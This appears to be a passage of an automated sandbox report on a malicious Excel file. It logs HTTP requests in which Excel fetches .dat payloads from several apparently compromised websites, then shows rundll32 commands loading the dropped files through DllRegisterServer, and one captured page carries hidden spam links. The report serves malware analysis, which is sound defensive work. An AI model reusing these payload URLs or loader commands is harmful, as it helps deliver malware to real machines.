                  Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
                  X-Powered-By: PHP/7.3.18
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.2249166159.89.174.3580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  Feb 23, 2021 16:16:21.123222113 CET2OUTGET /zdmqwymhhza/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: raivens.com
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:21.301707029 CET2INHTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Tue, 23 Feb 2021 15:16:21 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: keep-alive
                  Location: https://raivens.com/zdmqwymhhza/44250678185879600000.dat
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.224917070.32.104.1980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  Feb 23, 2021 16:16:23.907906055 CET74OUTGET /hmffuzbolyio/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: sportsmarquee.com
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:55.632601976 CET76INHTTP/1.1 404 Not Found
                  Date: Tue, 23 Feb 2021 15:16:23 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://sportsmarquee.com/wp-json/>; rel="https://api.w.org/"
                  Set-Cookie: cxssh_status=off; expires=Thu, 03-Jun-2021 15:16:55 GMT; Max-Age=8640000; path=/
                  Keep-Alive: timeout=5, max=1000
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 65 62 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 53 70 6f 72 74 73 20 4d 61 72 71 75 65 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 6d 61 72 74 2d 63 6f 75 70 6f 6e 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 73 6d 61 72 74 2d 63 6f 75 70 6f 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 31 2e 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 66 6f 72 6d 69 64 61 62 6c 65 2f 63 73 73 2f 66 6f 72 6d 69 64 61 62 6c 65 66 6f 72 6d 73 2e 63 73 73 3f 76 65 72 3d 31 31 31 34 31 36 31 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 35 2e 33 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 70 61 63 6b 61 67 65 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 62 6c 6f 63 6b 73 2f 62 75 69 6c 64 2f 76 65 6e 64 6f 72 73 2d 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 33 2e 36 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e
                  Data Ascii: 1eb6<!doctype html><html lang="en-US"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Page not found &#8211; Sports Marquee</title><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugins/woocommerce-smart-coupons/assets/css/smart-coupon.min.css?ver=4.1.2"><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugins/formidable/css/formidableforms.css?ver=11141612"><link rel="stylesheet" href="http://sportsmarquee.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3"><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-style.css?ver=3.6.0"><link rel="stylesheet" href="http://sportsmarquee.com/wp-content/plugin


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.224917158.96.102.6780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  Feb 23, 2021 16:16:56.083353043 CET86OUTGET /focahjqevd/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: erp.demosoftware.biz
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:56.460094929 CET87INHTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 15:10:30 GMT
                  Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
                  X-Powered-By: PHP/7.1.33
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html;charset=utf-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.224917213.126.100.3480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  Feb 23, 2021 16:16:56.698048115 CET87OUTGET /gvazzbwlvyk/44250678185879600000.dat HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: jayshreewoods.com
                  Connection: Keep-Alive
                  Feb 23, 2021 16:16:59.543236017 CET89INHTTP/1.1 301 Moved Permanently
                  Date: Tue, 23 Feb 2021 15:16:56 GMT
                  Server: Apache
                  X-Powered-By: PHP/7.3.11
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  X-Redirect-By: WordPress
                  X-Frame-Options: SAMEORIGIN
                  Location: https://jayshreewoods.com/gvazzbwlvyk/44250678185879600000.dat
                  Cache-Control: s-maxage=10
                  Keep-Alive: timeout=2, max=100
                  Connection: Keep-Alive
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 33 62 34 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 36 36 33 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 6e 65 63 6b 6c 61 63 65 2e 63 6f 6d 2f 6d 6f 74 68 65 72 73 2d 64 61 79 2d 6e 65 63 6b 6c 61 63 65 2d 66 6f 72 2d 6d 6f 74 68 65 72 73 2d 64 61 79 2f 22 3e 6d 6f 74 68 65 72 73 20 64 61 79 20 6e 65 63 6b 6c 61 63 65 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 6e 65 63 6b 6c 61 63 65 2e 63 6f 6d 2f 6d 6f 74 68 65 72 73 2d 64 61 79 2d 6e 65 63 6b 6c 61 63 65 2d 66 6f 72 2d 6d 6f 74 68 65 72 73 2d 64 61 79 2f 22 3e 6d 6f 74 68 65 72 27 73 20 64 61 79 20 6e 65 63 6b 6c 61 63 65 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 6e 65 63 6b 6c 61 63 65 2e 63 6f 6d 2f 6d 6f 74 68 65 72 73 2d 64 61 79 2d 6e 65 63 6b 6c 61 63 65 2d 66 6f 72 2d 6d 6f 74 68 65 72 73 2d 64 61 79 2f 22 3e 6d 6f 74 68 65 72 73 20 64 61 79 20 6e 65 63 6b 6c 61 63 65 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 6e 69 73 69 6c 6b 2e 63 6f 6d 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 73 69 6c 6b 2d 73 61 74 69 6e 2d 70 61 6a 61 6d 61 73 22 3e 73 61 74 69 6e 20 70 61 6a 61 6d 61 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 6e 69 73 69 6c 6b 2e 63 6f 6d 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 73 69 6c 6b 2d 73 63 61 72 66 22 3e 73 69 6c 6b 20 73 63 61 72 66 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 32 31 66 61 6e 73 2e 63 6f 6d 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 62 74 73 2d 61 72 6d 79 2d 62 6f 6d 62 2d 62 74 73 2d 6c 69 67 68 74 2d 73 74 69 63 6b 22 3e 61 72 6d 79 20 62 6f 6d 62 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 32 31 66 61 6e 73 2e 63 6f 6d 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 62 74 73 2d 61 72 6d 79 2d 62 6f 6d 62 2d 62 74 73 2d 6c 69 67 68 74 2d 73 74 69 63 6b 22 3e 61 72 6d 79 20 62 6f 6d 62 20 62 74 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6c 69 70 73 69 6c 6b 73 2e 63 6f 6d 2f 73 69 6c 6b 2d 73 63 61 72 66 2f 22 3e 73 69 6c 6b 20 73 63 61 72 66 20 66 6f 72 20 68 61 69 72 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6c 69 70 73 69 6c 6b 73 2e 63 6f 6d 2f 73 69 6c 6b 2d 73 63 61 72 66 2f 22 3e 73 69 6c 6b 20 68 61 69 72 20 73
                  Data Ascii: 3b4<!DOCTYPE html><html><body><div style="position:absolute; left:-6630px"><a href="https://www.insnecklace.com/mothers-day-necklace-for-mothers-day/">mothers day necklace</a><a href="https://www.insnecklace.com/mothers-day-necklace-for-mothers-day/">mother's day necklace</a><a href="https://www.insnecklace.com/mothers-day-necklace-for-mothers-day/">mothers day necklaces</a><a href="https://www.ninisilk.com/collections/silk-satin-pajamas">satin pajamas</a><a href="https://www.ninisilk.com/collections/silk-scarf">silk scarf</a><a href="https://www.bt21fans.com/collections/bts-army-bomb-bts-light-stick">army bomb</a><a href="https://www.bt21fans.com/collections/bts-army-bomb-bts-light-stick">army bomb bts</a><a href="https://www.slipsilks.com/silk-scarf/">silk scarf for hair</a><a href="https://www.slipsilks.com/silk-scarf/">silk hair s


                  HTTPS Packets

                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                  Feb 23, 2021 16:16:21.687463999 CET159.89.174.35443192.168.2.2249167CN=raivens.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Feb 21 04:48:51 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat May 22 05:48:51 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                  Feb 23, 2021 16:16:59.860344887 CET13.126.100.34443192.168.2.2249173CN=jayshreewoods.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Dec 30 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Fri Dec 31 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                  CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                  CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                  CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:16:16:32
                  Start date:23/02/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13ffb0000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:17
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:17
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso1,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:18
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso2,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:18
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso3,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:17:18
                  Start date:23/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\KLSD.ggsso4,DllRegisterServer
                  Imagebase:0xffb50000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >